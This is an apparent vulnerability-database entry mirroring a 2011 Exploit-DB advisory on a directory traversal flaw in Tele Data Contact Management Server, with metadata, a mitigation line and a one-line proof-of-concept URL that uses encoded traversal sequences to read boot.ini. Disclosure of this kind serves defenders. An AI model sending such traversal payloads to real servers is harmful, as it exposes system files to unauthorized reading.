Tele Data Contact Management Server

vendor:

Contact Management Server

by:

AutoSec Tools

N/A

CVSS

N/A

Directory Traversal

CWE

Product Name: Contact Management Server

Affected Version From: None

Affected Version To: None

Patch Exists: NO

Related CWE: None

CPE: None

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 EN

2011

Tele Data Contact Management Server

A directory traversal vulnerability in Tele Data Contact Management Server can be exploited to read files outside of the web root.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file system operations.

Source

Exploit-DB raw data:

------------------------------------------------------------------------
Software................Tele Data Contact Management Server
Vulnerability...........Directory Traversal
Threat Level............Serious (3/5)
Download................http://teledata.qc.ca/td_cms/
Discovery Date..........6/1/2011
Tested On...............Windows XP SP3 EN
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A directory traversal vulnerability in Tele Data Contact Management
Server can be exploited to read files outside of the web root.


--PoC--

http://localhost/%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../boot.ini